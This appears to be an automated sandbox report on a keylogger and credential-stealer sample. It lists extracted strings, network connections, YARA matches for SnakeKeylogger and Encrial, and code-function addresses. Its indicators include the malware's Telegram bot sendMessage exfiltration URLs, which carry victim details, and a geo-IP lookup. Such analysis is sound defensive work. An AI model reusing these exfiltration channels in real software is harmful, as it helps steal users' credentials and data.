                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1232049178.00000000099E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1232049178.00000000099E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1232049178.00000000099E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1232049178.00000000099E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: RegSvcs.exe, 0000000B.00000002.3652860794.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: RegSvcs.exe, 00000006.00000002.3646802426.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000029D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
                Source: RegSvcs.exe, 00000006.00000002.3646802426.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002AE9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000028DB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000029D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1227795797.0000000004EDE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002AE9000.00000004.00000800.00020000.00000000.sdmp, vQzHzddZ.exe, 00000007.00000002.1259225217.0000000003811000.00000004.00000800.00020000.00000000.sdmp, vQzHzddZ.exe, 00000007.00000002.1259225217.0000000004019000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000028DB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3642408543.000000000042E000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000029D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: RegSvcs.exe, 00000006.00000002.3646802426.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002AE9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000028DB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000029D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: RegSvcs.exe, 0000000B.00000002.3646332799.00000000029D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20a
                Source: RegSvcs.exe, 0000000B.00000002.3652860794.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: RegSvcs.exe, 00000006.00000002.3653336327.0000000003CD4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3652860794.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: RegSvcs.exe, 00000006.00000002.3653336327.0000000003CD4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3652860794.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: RegSvcs.exe, 0000000B.00000002.3646332799.0000000002961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: RegSvcs.exe, 00000006.00000002.3646802426.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.0000000002961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enT
                Source: RegSvcs.exe, 00000006.00000002.3646802426.0000000002B6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: RegSvcs.exe, 0000000B.00000002.3652860794.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: RegSvcs.exe, 00000006.00000002.3653336327.0000000003CD4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3652860794.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: RegSvcs.exe, 0000000B.00000002.3652860794.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: svchost.exe, 00000005.00000003.1205946383.000001BE7D522000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                Source: svchost.exe, 00000005.00000003.1205946383.000001BE7D522000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                Source: RegSvcs.exe, 0000000B.00000002.3652860794.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: svchost.exe, 00000005.00000003.1205946383.000001BE7D522000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                Source: edb.log.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                Source: RegSvcs.exe, 00000006.00000002.3646802426.0000000002A52000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002BB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002AE9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.0000000002842000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000028DB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000029B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1227795797.0000000004EDE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002A52000.00000004.00000800.00020000.00000000.sdmp, vQzHzddZ.exe, 00000007.00000002.1259225217.0000000003811000.00000004.00000800.00020000.00000000.sdmp, vQzHzddZ.exe, 00000007.00000002.1259225217.0000000004019000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.0000000002842000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3642408543.000000000042E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: RegSvcs.exe, 0000000B.00000002.3646332799.00000000029B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: RegSvcs.exe, 00000006.00000002.3646802426.0000000002BB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002AE9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002A7C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000028DB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.000000000286C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000029B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, vQzHzddZ.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: RegSvcs.exe, 00000006.00000002.3653336327.0000000003CD4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3652860794.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: RegSvcs.exe, 00000006.00000002.3653336327.0000000003CD4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3652860794.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: RegSvcs.exe, 0000000B.00000002.3646332799.0000000002992000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000028FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: RegSvcs.exe, 00000006.00000002.3646802426.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/T
                Source: RegSvcs.exe, 00000006.00000002.3646802426.0000000002B9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49758 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49760 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 7.2.vQzHzddZ.exe.405cdb0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.vQzHzddZ.exe.405cdb0.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.vQzHzddZ.exe.405cdb0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 7.2.vQzHzddZ.exe.405cdb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.vQzHzddZ.exe.4019990.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.vQzHzddZ.exe.405cdb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.vQzHzddZ.exe.4019990.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.vQzHzddZ.exe.405cdb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 7.2.vQzHzddZ.exe.4019990.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4edee80.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4edee80.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4edee80.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 7.2.vQzHzddZ.exe.4019990.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.vQzHzddZ.exe.4019990.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.vQzHzddZ.exe.4019990.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4edee80.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4edee80.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4edee80.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0000000B.00000002.3642408543.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000007.00000002.1259225217.0000000003811000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000007.00000002.1259225217.0000000004019000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1227795797.0000000004EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe PID: 7708, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: vQzHzddZ.exe PID: 8152, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegSvcs.exe PID: 7460, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeCode function: 0_2_031222A60_2_031222A6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeCode function: 0_2_031290F80_2_031290F8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeCode function: 0_2_0312A5180_2_0312A518
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeCode function: 0_2_03122C100_2_03122C10
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeCode function: 0_2_03122C000_2_03122C00
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeCode function: 0_2_031238100_2_03123810
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeCode function: 0_2_031238010_2_03123801
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeCode function: 0_2_03312B580_2_03312B58
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeCode function: 0_2_03314BE80_2_03314BE8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeCode function: 0_2_0A0494300_2_0A049430
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeCode function: 0_2_0A04BAD80_2_0A04BAD8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeCode function: 0_2_0A042C980_2_0A042C98
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeCode function: 0_2_0A042CB00_2_0A042CB0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeCode function: 0_2_0A044D200_2_0A044D20
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeCode function: 0_2_0A0430D80_2_0A0430D8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeCode function: 0_2_0A0451580_2_0A045158
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeCode function: 0_2_0A0435110_2_0A043511
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeCode function: 0_2_0A0435200_2_0A043520
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DFA0886_2_00DFA088
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DFC1466_2_00DFC146
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DFD2786_2_00DFD278
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DF53706_2_00DF5370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DFC4686_2_00DFC468
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DFC7386_2_00DFC738
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DFE9886_2_00DFE988
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DF69A06_2_00DF69A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DF3AA16_2_00DF3AA1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DFCA086_2_00DFCA08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DFCCD86_2_00DFCCD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DF6FC86_2_00DF6FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DFCFAB6_2_00DFCFAB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DFF6316_2_00DFF631
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DF39ED6_2_00DF39ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DF29EC6_2_00DF29EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DFE97B6_2_00DFE97B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DFFA886_2_00DFFA88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DF3E096_2_00DF3E09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063E96686_2_063E9668
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063E2A906_2_063E2A90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063E1FA86_2_063E1FA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063E18506_2_063E1850
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063E9D386_2_063E9D38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063E51486_2_063E5148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063ED2186_2_063ED218
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063ED6706_2_063ED670
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063ED6606_2_063ED660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063EDAB96_2_063EDAB9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063EDAC86_2_063EDAC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063E0B306_2_063E0B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063EDF206_2_063EDF20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063E0B206_2_063E0B20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063EDF126_2_063EDF12
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063EE3786_2_063EE378
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063EE36A6_2_063EE36A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063E1F9C6_2_063E1F9C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063EE7D06_2_063EE7D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063EE7CA6_2_063EE7CA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063EEC286_2_063EEC28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063E001E6_2_063E001E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063EEC186_2_063EEC18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063EF0716_2_063EF071
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063E94486_2_063E9448
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063E00406_2_063E0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063E18416_2_063E1841
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063E8CB06_2_063E8CB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063EF0806_2_063EF080
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063EF4D86_2_063EF4D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063EF4C86_2_063EF4C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063E8CC06_2_063E8CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063E51386_2_063E5138
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063EF9306_2_063EF930
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063EF9226_2_063EF922
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063ECDAF6_2_063ECDAF
